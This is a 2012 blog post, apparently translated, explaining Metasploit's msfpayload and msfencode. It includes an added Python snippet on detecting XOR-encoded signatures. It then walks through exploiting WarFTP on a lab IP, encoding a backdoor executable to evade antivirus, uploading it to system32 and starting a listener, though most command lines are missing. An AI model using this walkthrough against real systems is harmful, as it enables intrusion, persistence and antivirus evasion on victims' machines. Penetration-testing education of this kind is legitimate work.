Monday, 27 February 2012

WHAT'S THE DIFFERENCE BETWEEN MSFPAYLOAD AND MSFENCODE, AND HOW TO USE THEM

msfpayload is a command-line instance of Metasploit that is used to generate and output all of the various types of shellcode that are available in Metasploit. The most common use of this tool is to generate shellcode for an exploit that is not currently in the Metasploit Framework, or to test different types of shellcode and options before finalizing a module.

msfencode, on the other hand, is a tool that alters the code in an executable so that it looks different to antivirus software but will still run the same way. Much as a binary attachment in email is encoded in Base64, msfencode encodes the original executable in a new binary. Then, when the executable is run, the decoder stub added by msfencode decodes the original code into memory and executes it. You can use msfencode -h to see a list of msfencode usage options. Of the msfencode options, the encoder formats are among the most important. For a list of encoder formats, we use msfencode -l. Notice that different encoders are used for different platforms: a PowerPC (PPC) encoder, for example, will not operate correctly on an x86 platform because of differences between the two architectures.
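
As an added example (not from the original post and not Metasploit code), the Python sketch below shows from the defender's side why a static byte signature stops matching once content has been encoded, and how a sweep over every single-byte XOR key still finds it. The single-byte XOR scheme, the marker bytes and all function names are assumptions for illustration; msfencode's real encoders are more varied, so a sweep like this covers only the simplest case.

```python
"""Added example: static signature matching versus a single-byte XOR sweep.
The XOR scheme and marker bytes are assumptions, not msfencode's encoders."""

# Constructed stand-in for a byte signature an antivirus engine might match on.
SIGNATURE = b"CONSTRUCTED-TEST-MARKER"


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a single-byte key."""
    return bytes(b ^ key for b in data)


def naive_scan(blob: bytes, signature: bytes = SIGNATURE) -> int:
    """Plain substring match, as a static signature does. Returns -1 if absent."""
    return blob.find(signature)


def xor_sweep(blob: bytes, signature: bytes = SIGNATURE):
    """Search for the signature under all 256 single-byte XOR keys.

    Returns a list of (key, offset) tuples, one per match.
    Key 0 is the unencoded case, so this is a superset of naive_scan.
    """
    hits = []
    for key in range(256):
        needle = xor_bytes(signature, key)
        start = blob.find(needle)
        while start != -1:
            hits.append((key, start))
            start = blob.find(needle, start + 1)
    return hits


def build_sample(key: int) -> bytes:
    """Constructed sample: 16 filler bytes, the encoded marker, 8 filler bytes."""
    return b"\xaa" * 16 + xor_bytes(SIGNATURE, key) + b"\x00" * 8


if __name__ == "__main__":
    sample = build_sample(0x5A)
    print("static match offset:", naive_scan(sample))   # signature no longer present
    for key, offset in xor_sweep(sample):
        print(f"XOR sweep hit: key=0x{key:02x} offset={offset}")
```

Encoders that change the key or the decoder per output defeat this kind of sweep, which is why static matching is usually paired with behavioural and in-memory scanning after the content has decoded itself.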


This tool has many different options and variables available to it, but they may not all be fully realized given the limited output in the help banner.


We can use msfpayload -l to list all the payloads msfpayload offers.


And others; you can see them if you run it :)


=========== >>>>


OK, let's exploit using msfpayload


1. First we need to enumerate the service


In this case I will exploit WarFTP on the W**ndows operating system.


This application uses port 21, and the victim's IP address is 192.168.56.101.


2. Once we know the port and IP of the victim, open msfconsole


Search for warftp in msfconsole.


Use one of the exploits.





LHOST = your IP
RHOST = the victim's IP
RPORT = the port found during service enumeration of the application (WarFTP)



Set the TARGET










Set the PAYLOAD




Let's show the options




OK, once we are satisfied with our exploit settings, let's run the exploitation (the WarFTP application must be running).


OK, it succeeded; now let's create a backdoor using msfpayload.


3. Create a backdoor using msfpayload


Open a new terminal



root@justview:~# cd /opt/framework/msf3/
root@justview:/opt/framework/msf3# ./msfpayload -l

We will use msfpayload in combination with msfencode.



Move the generated executable to /root
root@justview:/opt/framework/msf3# mv hajar.exe /root/

4. Upload the backdoor to win****s at C://windows//system32

Go back to your meterpreter session.

After that, execute the backdoor (payload).

5. Execute the backdoor

Open a new terminal and run msfconsole
msf > use exploit/multi/handler 
